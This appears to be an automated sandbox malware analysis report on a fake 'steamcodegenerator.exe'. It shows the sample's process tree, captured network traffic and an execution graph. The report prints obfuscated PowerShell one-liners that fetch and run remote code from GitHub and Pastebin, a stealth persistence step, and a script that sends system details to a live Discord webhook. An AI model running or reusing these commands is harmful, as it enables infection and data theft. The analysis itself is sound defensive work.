                                                                      Access-Control-Allow-Origin: *
                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                      X-Fastly-Request-ID: 5fb2841b8dc086f1158375955679e48c06408ce1
                                                                      Expires: Tue, 15 Oct 2024 14:05:03 GMT
                                                                      Source-Age: 8
                                                                       2024-10-15 14:00:03 UTC | 1378 | IN | Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                      Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                      2024-10-15 14:00:03 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                      Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                      2024-10-15 14:00:03 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                      Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       8 | 192.168.2.4 | 49749 | 162.159.138.232 | 443 | 5660 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       2024-10-15 14:00:08 UTC | 311 | OUT | POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                       User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                       Content-Type: application/json
                                                                       Host: discord.com
                                                                       Content-Length: 298
                                                                       Connection: Keep-Alive
                                                                       2024-10-15 14:00:08 UTC | 298 | OUT | Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** Y_5VDGUM\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                                       2024-10-15 14:00:08 UTC | 1255 | IN | HTTP/1.1 404 Not Found
                                                                       Date: Tue, 15 Oct 2024 14:00:08 GMT
                                                                       Content-Type: application/json
                                                                       Content-Length: 45
                                                                       Connection: close
                                                                       Cache-Control: public, max-age=3600, s-maxage=3600
                                                                       strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                       x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                       x-ratelimit-limit: 5
                                                                       x-ratelimit-remaining: 4
                                                                       x-ratelimit-reset: 1729000809
                                                                       x-ratelimit-reset-after: 1
                                                                       via: 1.1 google
                                                                       alt-svc: h3=":443"; ma=86400
                                                                       CF-Cache-Status: DYNAMIC
                                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4y9gj4sWdq%2By0jEQwDG6uSzZLfzSQLJs6deNAx5PdrOB87WoZAU0lF29ALF%2Fb28JQcPnLPKT4f6HKjVVNXTMsTjMVSKMCgEkjbQ2y%2BU7MHWSvJH7VYbbjIKrGoWV"}],"group":"cf-nel","max_age":604800}
                                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                       X-Content-Type-Options: nosniff
                                                                       Set-Cookie: __cfruid=898bd1d6d1178ff7245a151efa26800a53bbff85-1729000808; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                       Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                       Set-Cookie: _cfuvid=shRMVpCMnQJcd9oFhWDOKkHJPOxlMBHoMx_v_HmOv2k-1729000808433-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                       Server: cloudflare
                                                                       CF-RAY: 8d30556bdcc53455-DFW
                                                                       2024-10-15 14:00:08 UTC | 45 | IN | Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       9 | 192.168.2.4 | 49763 | 162.159.138.232 | 443 | 7248 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       2024-10-15 14:00:16 UTC | 311 | OUT | POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                       User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                       Content-Type: application/json
                                                                       Host: discord.com
                                                                       Content-Length: 298
                                                                       Connection: Keep-Alive
                                                                       2024-10-15 14:00:16 UTC | 298 | OUT | Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** Y_5VDGUM\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                                       2024-10-15 14:00:16 UTC | 1257 | IN | HTTP/1.1 404 Not Found
                                                                       Date: Tue, 15 Oct 2024 14:00:16 GMT
                                                                       Content-Type: application/json
                                                                       Content-Length: 45
                                                                       Connection: close
                                                                       Cache-Control: public, max-age=3600, s-maxage=3600
                                                                       strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                       x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                       x-ratelimit-limit: 5
                                                                       x-ratelimit-remaining: 4
                                                                       x-ratelimit-reset: 1729000817
                                                                       x-ratelimit-reset-after: 1
                                                                       via: 1.1 google
                                                                       alt-svc: h3=":443"; ma=86400
                                                                       CF-Cache-Status: DYNAMIC
                                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5jjzbRDm%2B2SlpjKVS72i7IPSdiTMsScsmN0thaBYTgtj6qqodAYw7O7hfydAkKesLwdKFKeexRvA9ISH6R%2BRd4gD6CE7yn1CKxr%2BAdg8y0Q8Vn6c%2B5D5xu69Z3mg"}],"group":"cf-nel","max_age":604800}
                                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                       X-Content-Type-Options: nosniff
                                                                       Set-Cookie: __cfruid=e316ba9d782cc8a8d64ff500cb6e6c4c929f0dd5-1729000816; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                       Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                       Set-Cookie: _cfuvid=6UMiXvDrHMMRL.7XfRyxsGJQ1gU6UcIilxJInvvqYJg-1729000816294-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                       Server: cloudflare
                                                                       CF-RAY: 8d30559cfb90e867-DFW
                                                                       2024-10-15 14:00:16 UTC | 45 | IN | Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                      Target ID:0
                                                                      Start time:09:59:22
                                                                      Start date:15/10/2024
                                                                      Path:C:\Users\user\Desktop\steamcodegenerator.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Users\user\Desktop\steamcodegenerator.exe"
                                                                      Imagebase:0x7ff663540000
                                                                      File size:258'048 bytes
                                                                      MD5 hash:D4F1751389516A3DFAC98551142CB153
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.3629921626.0000022AF4E10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.3629903861.0000022AF4D00000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Target ID:1
                                                                      Start time:09:59:22
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:2
                                                                      Start time:09:59:27
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}
                                                                      Imagebase:0x7ff788560000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:09:59:30
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)
                                                                      Imagebase:0x7ff788560000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:4
                                                                      Start time:09:59:30
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:8
                                                                      Start time:09:59:48
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\attrib.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                      Imagebase:0xe30000
                                                                      File size:23'040 bytes
                                                                      MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:09:59:49
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\forfiles.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                      Imagebase:0x7ff7729f0000
                                                                      File size:52'224 bytes
                                                                      MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      Target ID:10
                                                                      Start time:09:59:49
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:11
                                                                      Start time:09:59:49
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                      Imagebase:0x7ff788560000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:12
                                                                      Start time:09:59:50
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                      Imagebase:0x7ff788560000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:13
                                                                      Start time:09:59:57
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\forfiles.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                      Imagebase:0x7ff7729f0000
                                                                      File size:52'224 bytes
                                                                      MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Target ID:14
                                                                      Start time:09:59:57
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Target ID:15
                                                                      Start time:09:59:57
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                      Imagebase:0x7ff788560000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Target ID:16
                                                                      Start time:09:59:57
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                      Imagebase:0x7ff788560000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false


                                                                        Execution Graph

                                                                        Execution Coverage:3.3%
                                                                        Dynamic/Decrypted Code Coverage:14.7%
                                                                        Signature Coverage:13.7%
                                                                        Total number of Nodes:497
                                                                        Total number of Limit Nodes:30
                                                                        execution_graph 18704 22af4e5221c 18705 22af4e52235 __scrt_is_managed_app __scrt_initialize_crt __scrt_release_startup_lock 18704->18705 18705->18704 18707 22af4e52280 18705->18707 18708 22af4e51360 18705->18708 18709 22af4e5139e 18708->18709 18710 22af4e51435 WinExec 18709->18710 18711 22af4e51448 18710->18711 18712 7ff663546130 18714 7ff663546164 18712->18714 18725 7ff6635462ac messages BuildCatchObjectHelperInternal 18712->18725 18713 7ff66354635e 18746 7ff663546370 18713->18746 18714->18713 18717 7ff6635461bb 18714->18717 18718 7ff663546207 18714->18718 18714->18725 18720 7ff663546358 18717->18720 18726 7ff663548db8 18717->18726 18722 7ff663548db8 std::_Facet_Register 49 API calls 18718->18722 18724 7ff6635461ca BuildCatchObjectHelperInternal 18718->18724 18740 7ff6635412b0 18720->18740 18722->18724 18724->18725 18735 7ff663552044 18724->18735 18730 7ff663548dc3 18726->18730 18727 7ff663548ddc 18727->18724 18729 7ff663548de2 18731 7ff663548ded 18729->18731 18752 7ff663546668 18729->18752 18730->18727 18730->18729 18749 7ff663555484 18730->18749 18733 7ff6635412b0 Concurrency::cancel_current_task 49 API calls 18731->18733 18734 7ff663548df3 messages 18733->18734 18734->18724 18767 7ff663551ebc 18735->18767 18741 7ff6635412be Concurrency::cancel_current_task 18740->18741 18742 7ff66354ab1c Concurrency::cancel_current_task 2 API calls 18741->18742 18743 7ff6635412cf 18742->18743 18967 7ff66354a8d8 18743->18967 18745 7ff6635412f9 18745->18713 18980 7ff663546688 18746->18980 18756 7ff6635554c4 18749->18756 18753 7ff663546676 std::bad_alloc::bad_alloc 18752->18753 18762 7ff66354ab1c 18753->18762 18755 7ff663546687 18761 7ff663552104 EnterCriticalSection 18756->18761 18758 7ff6635554d1 18759 7ff663552158 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 18758->18759 18760 7ff663555496 18759->18760 18760->18730 18763 7ff66354ab3b 18762->18763 18764 7ff66354ab86 RaiseException 
18763->18764 18765 7ff66354ab64 RtlPcToFileHeader 18763->18765 18764->18755 18766 7ff66354ab7c 18765->18766 18766->18764 18768 7ff663551ee7 18767->18768 18779 7ff663551f58 18768->18779 18770 7ff663551f0e 18772 7ff663551f31 18770->18772 18789 7ff6635509d0 18770->18789 18773 7ff663551f46 18772->18773 18774 7ff6635509d0 ProcessCodePage 47 API calls 18772->18774 18775 7ff663552074 IsProcessorFeaturePresent 18773->18775 18774->18773 18776 7ff663552087 18775->18776 18777 7ff663551d58 _invalid_parameter_noinfo_noreturn 14 API calls 18776->18777 18778 7ff6635520a2 GetCurrentProcess TerminateProcess 18777->18778 18798 7ff663551ca0 18779->18798 18783 7ff663551f93 18783->18770 18785 7ff663552074 _invalid_parameter_noinfo_noreturn 17 API calls 18786 7ff663552023 18785->18786 18787 7ff663551ebc _invalid_parameter_noinfo_noreturn 47 API calls 18786->18787 18788 7ff66355203d 18787->18788 18788->18770 18790 7ff663550a28 18789->18790 18791 7ff6635509df GetLastError 18789->18791 18790->18772 18792 7ff6635509f4 18791->18792 18793 7ff66355a4d8 ProcessCodePage 16 API calls 18792->18793 18794 7ff663550a0e SetLastError 18793->18794 18794->18790 18795 7ff663550a31 18794->18795 18876 7ff663554e4c 18795->18876 18799 7ff663551cbc GetLastError 18798->18799 18800 7ff663551cf7 18798->18800 18801 7ff663551ccc 18799->18801 18800->18783 18804 7ff663551d0c 18800->18804 18807 7ff66355a4d8 18801->18807 18805 7ff663551d28 GetLastError SetLastError 18804->18805 18806 7ff663551d40 18804->18806 18805->18806 18806->18783 18806->18785 18808 7ff66355a4f7 FlsGetValue 18807->18808 18809 7ff66355a512 FlsSetValue 18807->18809 18810 7ff66355a50c 18808->18810 18812 7ff663551ce7 SetLastError 18808->18812 18811 7ff66355a51f 18809->18811 18809->18812 18810->18809 18824 7ff663558a7c 18811->18824 18812->18800 18814 7ff66355a52e 18815 7ff66355a54c FlsSetValue 18814->18815 18816 7ff66355a53c FlsSetValue 18814->18816 18818 7ff66355a56a 18815->18818 18819 7ff66355a558 FlsSetValue 18815->18819 18817 7ff66355a545 
18816->18817 18831 7ff663558af4 18817->18831 18837 7ff66355a048 18818->18837 18819->18817 18829 7ff663558a8d _set_fmode 18824->18829 18825 7ff663558ade 18842 7ff663554848 18825->18842 18826 7ff663558ac2 HeapAlloc 18827 7ff663558adc 18826->18827 18826->18829 18827->18814 18829->18825 18829->18826 18830 7ff663555484 std::_Facet_Register 2 API calls 18829->18830 18830->18829 18832 7ff663558af9 HeapFree 18831->18832 18833 7ff663558b28 18831->18833 18832->18833 18834 7ff663558b14 GetLastError 18832->18834 18833->18812 18835 7ff663558b21 __free_lconv_num 18834->18835 18836 7ff663554848 _set_fmode 9 API calls 18835->18836 18836->18833 18862 7ff663559f20 18837->18862 18845 7ff66355a410 GetLastError 18842->18845 18844 7ff663554851 18844->18827 18846 7ff66355a451 FlsSetValue 18845->18846 18850 7ff66355a434 18845->18850 18847 7ff66355a463 18846->18847 18851 7ff66355a441 18846->18851 18849 7ff663558a7c _set_fmode 5 API calls 18847->18849 18848 7ff66355a4bd SetLastError 18848->18844 18852 7ff66355a472 18849->18852 18850->18846 18850->18851 18851->18848 18853 7ff66355a490 FlsSetValue 18852->18853 18854 7ff66355a480 FlsSetValue 18852->18854 18856 7ff66355a49c FlsSetValue 18853->18856 18857 7ff66355a4ae 18853->18857 18855 7ff66355a489 18854->18855 18859 7ff663558af4 __free_lconv_num 5 API calls 18855->18859 18856->18855 18858 7ff66355a048 _set_fmode 5 API calls 18857->18858 18860 7ff66355a4b6 18858->18860 18859->18851 18861 7ff663558af4 __free_lconv_num 5 API calls 18860->18861 18861->18848 18874 7ff663552104 EnterCriticalSection 18862->18874 18885 7ff66355f8d8 18876->18885 18919 7ff66355f890 18885->18919 18924 7ff663552104 EnterCriticalSection 18919->18924 18968 7ff66354a8f9 18967->18968 18969 7ff66354a92e __std_exception_copy 18967->18969 18968->18969 18971 7ff663551b00 18968->18971 18969->18745 18972 7ff663551b0d 18971->18972 18973 7ff663551b17 18971->18973 18972->18973 18978 7ff663551b32 18972->18978 18974 7ff663554848 _set_fmode 11 API calls 18973->18974 18975 7ff663551b1e 
18974->18975 18976 7ff663552024 _invalid_parameter_noinfo 47 API calls 18975->18976 18977 7ff663551b2a 18976->18977 18977->18969 18978->18977 18979 7ff663554848 _set_fmode 11 API calls 18978->18979 18979->18975 18985 7ff663546518 18980->18985 18983 7ff66354ab1c Concurrency::cancel_current_task 2 API calls 18984 7ff6635466aa 18983->18984 18986 7ff66354a8d8 __std_exception_copy 47 API calls 18985->18986 18987 7ff66354654c 18986->18987 18987->18983 18988 7ff663548f04 19009 7ff6635490d0 18988->19009 18991 7ff66354905b 19074 7ff66354998c IsProcessorFeaturePresent 18991->19074 18992 7ff663548f25 __scrt_acquire_startup_lock 18994 7ff663549065 18992->18994 19001 7ff663548f43 __scrt_release_startup_lock 18992->19001 18995 7ff66354998c 7 API calls 18994->18995 18997 7ff663549070 BuildCatchObjectHelperInternal 18995->18997 18996 7ff663548f68 18998 7ff663548fee 19017 7ff663555e2c 18998->19017 19000 7ff663548ff3 19023 7ff663542230 19000->19023 19001->18996 19001->18998 19063 7ff6635561d8 19001->19063 19006 7ff663549017 19006->18997 19070 7ff663549254 19006->19070 19010 7ff6635490d8 19009->19010 19011 7ff6635490e4 __scrt_dllmain_crt_thread_attach 19010->19011 19012 7ff663548f1d 19011->19012 19013 7ff6635490f1 19011->19013 19012->18991 19012->18992 19081 7ff6635580fc 19013->19081 19018 7ff663555e3c 19017->19018 19022 7ff663555e51 19017->19022 19018->19022 19124 7ff663555acc 19018->19124 19022->19000 19024 7ff663542285 19023->19024 19416 7ff663544a50 19024->19416 19026 7ff663542328 19027 7ff663543b80 49 API calls 19026->19027 19028 7ff663542343 19027->19028 19029 7ff663543b80 49 API calls 19028->19029 19030 7ff663542390 19029->19030 19031 7ff663543b80 49 API calls 19030->19031 19036 7ff6635423dd messages 19031->19036 19032 7ff6635424e6 SleepEx 19033 7ff66354251e 19032->19033 19039 7ff66354252c VirtualAlloc 19033->19039 19048 7ff663542571 messages 19033->19048 19034 7ff663552044 _invalid_parameter_noinfo_noreturn 47 API calls 19035 7ff66354275b 19034->19035 19037 7ff663552044 
_invalid_parameter_noinfo_noreturn 47 API calls 19035->19037 19036->19032 19036->19035 19038 7ff663542761 19036->19038 19062 7ff663542755 19036->19062 19037->19038 19040 7ff663552044 _invalid_parameter_noinfo_noreturn 47 API calls 19038->19040 19041 7ff66354254e BuildCatchObjectHelperInternal 19039->19041 19039->19048 19042 7ff663542767 19040->19042 19045 7ff66354255e VirtualFree 19041->19045 19043 7ff663552044 _invalid_parameter_noinfo_noreturn 47 API calls 19042->19043 19044 7ff66354276d 19043->19044 19046 7ff663552044 _invalid_parameter_noinfo_noreturn 47 API calls 19044->19046 19045->19048 19047 7ff663542773 19046->19047 19049 7ff663552044 _invalid_parameter_noinfo_noreturn 47 API calls 19047->19049 19048->19042 19048->19044 19048->19047 19050 7ff663542779 19048->19050 19051 7ff66354277f 19048->19051 19055 7ff66354271f messages 19048->19055 19058 7ff663542785 19048->19058 19059 7ff663542750 19048->19059 19049->19050 19052 7ff663552044 _invalid_parameter_noinfo_noreturn 47 API calls 19050->19052 19054 7ff663552044 _invalid_parameter_noinfo_noreturn 47 API calls 19051->19054 19052->19051 19053 7ff663548d90 _invalid_parameter_noinfo_noreturn 8 API calls 19057 7ff663542733 19053->19057 19054->19058 19055->19053 19056 7ff663552044 _invalid_parameter_noinfo_noreturn 47 API calls 19060 7ff66354278b 19056->19060 19068 7ff663549adc GetModuleHandleW 19057->19068 19058->19056 19061 7ff663552044 _invalid_parameter_noinfo_noreturn 47 API calls 19059->19061 19061->19062 19062->19034 19064 7ff6635561ef 19063->19064 19065 7ff663556210 19063->19065 19064->18998 19425 7ff663558148 19065->19425 19069 7ff663549aed 19068->19069 19069->19006 19071 7ff663549265 19070->19071 19072 7ff66354902e 19071->19072 19073 7ff66354ae30 7 API calls 19071->19073 